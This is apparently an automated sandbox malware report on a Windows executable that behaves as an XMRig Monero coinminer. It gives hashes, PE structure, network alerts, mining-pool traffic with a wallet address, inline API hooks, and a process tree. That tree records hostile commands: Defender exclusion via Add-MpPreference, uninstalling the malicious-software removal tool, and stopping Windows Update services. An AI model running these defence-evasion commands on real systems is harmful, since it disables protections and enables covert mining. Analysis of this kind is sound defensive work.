                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\ProgramData\Screenshots\Lightshot.exe
                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):14544
                                                                        Entropy (8bit):6.2660301556221185
                                                                        Encrypted:false
                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View (previously analysed samples with the same dropped file):
• Filename: chrtrome22.exe, Detection: malicious
• Filename: pTVKHqys2h.exe, Detection: malicious
• Filename: 174.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: 47SXvEQ.exe, Detection: malicious
• Filename: xmr new.exe, Detection: malicious
• Filename: eth.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: hiwA7Blv7C.exe, Detection: malicious
                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Entropy (8bit):6.537334125155787
                                                                        TrID:
                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:nW2oopMIdg.exe
                                                                        File size:2'876'416 bytes
                                                                        MD5:990a3f3b1273510f210fb9b541da219f
                                                                        SHA1:33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
                                                                        SHA256:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
                                                                        SHA512:495734313cae980d3f48ef78422cf9484eb347833672fd5c693f8f8c92c1c0d51986795cd55a3148be18ff0c9d36adff5a1c3ff18200668dd33f3978a459c246
                                                                        SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                        TLSH:29D523E536CE4726C8143C71F4A6898918EF7A8AD3BBB1B7644483736A747B34DB7048
                                                                        File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`........................................
                                                                        Icon Hash:00928e8e8686b000
                                                                        Entrypoint:0x140001140
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x140000000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x678007E8 [Thu Jan 9 17:31:20 2025 UTC]
                                                                        TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:de41d4e0545d977de6ca665131bb479a
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc978 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c5000 | 0x350 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x2c2000 | 0x18c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c6000 | 0x78 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb0a0 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb410 | 0x138 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xcb10 | 0x158 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9066 | 0x9200 | 0a4b4175ec481c50c984590193f52f1a | False | 0.4883615154109589 | data | 6.152703474213046 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x20cc | 0x2200 | d031d7bab38efd70773bc93d35fb58a6 | False | 0.45128676470588236 | data | 4.641594651888488 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xe000 | 0x2b3190 | 0x2b2000 | 3a7c43391555cab936df087d609d1d01 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x2c2000 | 0x18c | 0x200 | 71971e4bff0784f885ec5f86f32b6a4a | False | 0.521484375 | data | 3.204851117192452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.00cfg | 0x2c3000 | 0x10 | 0x200 | b18c7380298e104adf73576fa46bccc1 | False | 0.04296875 | data | 0.15127132530476972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x2c4000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2c5000 | 0x350 | 0x400 | 56e59519fb7d2369bbf7a9e80aa61940 | False | 0.3642578125 | data | 2.8188436463026587 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c6000 | 0x78 | 0x200 | 6490b02f8b3f1652073b3b9bdd2acfb4 | False | 0.236328125 | data | 1.4268248333801306 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x2c5060 | 0x2f0 | SysEx File - ID | English | United States | 0.449468085106383
Imports:
DLL | Import
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll | DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
Language of compilation system | Country where language is spoken
English | United States
Network IDS alerts (Suricata/ET rules):
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T10:35:51.244025+0100 | 2826930 | ETPRO COINMINER XMR CoinMiner Usage | 2 | 192.168.2.5 | 49704 | 141.94.96.71 | 80 | TCP
2025-01-10T10:36:03.317801+0100 | 2047928 | ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com) | 2 | 192.168.2.5 | 63299 | 1.1.1.1 | 53 | UDP
DNS queries:
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 10:36:03.317800999 CET | 192.168.2.5 | 1.1.1.1 | 0xd21e | Standard query (0) | pool.supportxmr.com | A (IP address) | IN (0x0001) | false
DNS answers:
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 10:36:03.325510979 CET | 1.1.1.1 | 192.168.2.5 | 0xd21e | No error (0) | pool.supportxmr.com | pool-fr.supportxmr.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 10:36:03.325510979 CET | 1.1.1.1 | 192.168.2.5 | 0xd21e | No error (0) | pool-fr.supportxmr.com | | 141.94.96.144 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:36:03.325510979 CET | 1.1.1.1 | 192.168.2.5 | 0xd21e | No error (0) | pool-fr.supportxmr.com | | 141.94.96.195 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 10:36:03.325510979 CET | 1.1.1.1 | 192.168.2.5 | 0xd21e | No error (0) | pool-fr.supportxmr.com | | 141.94.96.71 | A (IP address) | IN (0x0001) | false
TCP session (Stratum mining traffic, carried over port 80 from an injected dialer.exe):
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 141.94.96.71 | 80 | 4508 | C:\Windows\System32\dialer.exe
Timestamp | Bytes transferred | Direction | Data (ASCII; raw hex omitted)
Jan 10, 2025 10:36:03.335095882 CET | 596 | OUT |
Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw","pass":"Ultima","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/
Jan 10, 2025 10:36:03.968880892 CET | 538 | IN |
Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"1fcf1a1d-3941-49f3-87de-bbb3015b97e5","job":{"blob":"1010fbd383bc06ca3f810fd9c56c49dd4d214ad84ef82765919a0dd8462e68424b6661b8b7282800000000f8b23ac90f692ad6af23855bc9bc4f381b4dd13dd3e975b7c0c
Jan 10, 2025 10:36:06.134874105 CET | 420 | IN |
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101085d483bc06ca3f810fd9c56c49dd4d214ad84ef82765919a0dd8462e68424b6661b8b7282800000000a70ed1613f655caa469dab3eab0129259b1016d4822986761cfecac66485f9aa4f","job_id":"rYU0I1Epjxl6wf6AJmit0FZO1For"
Jan 10, 2025 10:36:16.531831980 CET | 420 | IN |
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101090d483bc06ca3f810fd9c56c49dd4d214ad84ef82765919a0dd8462e68424b6661b8b7282800000000851e70714ac4abc90ff92a2b2d7a6bc4a3742d98fe48d02c458b20dae3bec01353","job_id":"z45UTv8G64d9jx+oJDKJXu9L4Rok"
Jan 10, 2025 10:36:18.708017111 CET | 420 | IN |
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101092d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e0000000064b7f26fefab437e50f0bf5a10a353db4a1ad7c7123cf16712a016a8b34d680702","job_id":"i36L8xtVwSnXGqKS1Ub1rke40PKt"
Jan 10, 2025 10:36:30.317203999 CET | 420 | IN |
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109ed483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000ed300fe08d982387e1dd7b5bd25c9525a7842d3c0f7ae574c492dc4bd8da175607","job_id":"8g8BACOfS20UCQ35l7twN1UcD9jF"
Jan 10, 2025 10:36:40.431463003 CET | 420 | IN |
Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010a8d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000dfbd38264005f46b28f2dfcbd0b2b4ab1bf4a92738ee54fb51268b4a084d7b070a","job_id":"qzP+wrYvhGPcLWh+CgFhKiT6uY+s"
Jan 10, 2025 10:36:52.456737995 CET | 420 | IN |
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b4d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000d5f4b8cfeaa6ce94b542e8a5e1ff6d2bf2d70a399a7ba1568144435e2c812a100f","job_id":"5fwJV97zChLtAOHEAgxKsJzhH+V1"
                                                                        Jan 10, 2025 10:37:02.785851955 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 65 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010bed483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000576db3f2b7768cbcfbf45cab0288667d7e06023264fd060468fb4c31e7b0f39314","job_id":"EfhK+pzlXURDKY4a6LdJi5SakjtD"
                                                                        Jan 10, 2025 10:37:12.795152903 CET420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 38 64 34 38 33 62 63 30 36 31 65 33 64 30 35 32 64 38 63 37 32 64 36 30 39 38 30
                                                                        Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c8d483bc061e3d052d8c72d609804675148e567bed958fe8827c5aec4d67c595ba8b4a0e8e00000000242f4815cb40760e45fbacc63cc92c7dd02d6211b4d0c02ea602536153821aa51a","job_id":"xHm1q4gS0BDF66ovz70uv/eQODWX"


                                                                        Code Manipulations

                                                                        Function Name                    Hook Type   Active in Processes
                                                                        ZwEnumerateKey                   INLINE      winlogon.exe, explorer.exe
                                                                        NtQuerySystemInformation         INLINE      winlogon.exe, explorer.exe
                                                                        ZwResumeThread                   INLINE      winlogon.exe, explorer.exe
                                                                        NtDeviceIoControlFile            INLINE      winlogon.exe, explorer.exe
                                                                        ZwDeviceIoControlFile            INLINE      winlogon.exe, explorer.exe
                                                                        NtEnumerateKey                   INLINE      winlogon.exe, explorer.exe
                                                                        NtQueryDirectoryFile             INLINE      winlogon.exe, explorer.exe
                                                                        ZwEnumerateValueKey              INLINE      winlogon.exe, explorer.exe
                                                                        ZwQuerySystemInformation         INLINE      winlogon.exe, explorer.exe
                                                                        NtResumeThread                   INLINE      winlogon.exe, explorer.exe
                                                                        RtlGetNativeSystemInformation    INLINE      winlogon.exe, explorer.exe
                                                                        NtQueryDirectoryFileEx           INLINE      winlogon.exe, explorer.exe
                                                                        NtEnumerateValueKey              INLINE      winlogon.exe, explorer.exe
                                                                        ZwQueryDirectoryFileEx           INLINE      winlogon.exe, explorer.exe
                                                                        ZwQueryDirectoryFile             INLINE      winlogon.exe, explorer.exe

                                                                        Function Name                    Hook Type   New Data
                                                                        ZwEnumerateKey                   INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQuerySystemInformation         INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        ZwResumeThread                   INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        NtDeviceIoControlFile            INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        ZwDeviceIoControlFile            INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        NtEnumerateKey                   INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQueryDirectoryFile             INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        ZwEnumerateValueKey              INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQuerySystemInformation         INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtResumeThread                   INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        RtlGetNativeSystemInformation    INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtQueryDirectoryFileEx           INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        NtEnumerateValueKey              INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQueryDirectoryFileEx           INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        ZwQueryDirectoryFile             INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                        Function Name                    Hook Type   New Data
                                                                        ZwEnumerateKey                   INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQuerySystemInformation         INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        ZwResumeThread                   INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        NtDeviceIoControlFile            INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        ZwDeviceIoControlFile            INLINE      0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                        NtEnumerateKey                   INLINE      0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                        NtQueryDirectoryFile             INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                        ZwEnumerateValueKey              INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQuerySystemInformation         INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtResumeThread                   INLINE      0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                        RtlGetNativeSystemInformation    INLINE      0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                        NtQueryDirectoryFileEx           INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        NtEnumerateValueKey              INLINE      0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                        ZwQueryDirectoryFileEx           INLINE      0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                        ZwQueryDirectoryFile             INLINE      0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                        Target ID:0
                                                                        Start time:04:35:53
                                                                        Start date:10/01/2025
                                                                        Path:C:\Users\user\Desktop\nW2oopMIdg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\nW2oopMIdg.exe"
                                                                        Imagebase:0x7ff7eb900000
                                                                        File size:2'876'416 bytes
                                                                        MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:1
                                                                        Start time:04:35:53
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:04:35:53
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:5
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff747680000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:9
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\wusa.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff7bb240000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:10
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:11
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:12
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:13
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:14
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:15
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:16
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:17
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:18
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:19
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:20
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
